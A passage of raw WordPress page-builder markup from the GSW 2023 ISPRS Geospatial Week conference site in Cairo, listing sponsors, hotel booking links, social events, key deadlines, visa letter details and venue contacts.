center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a 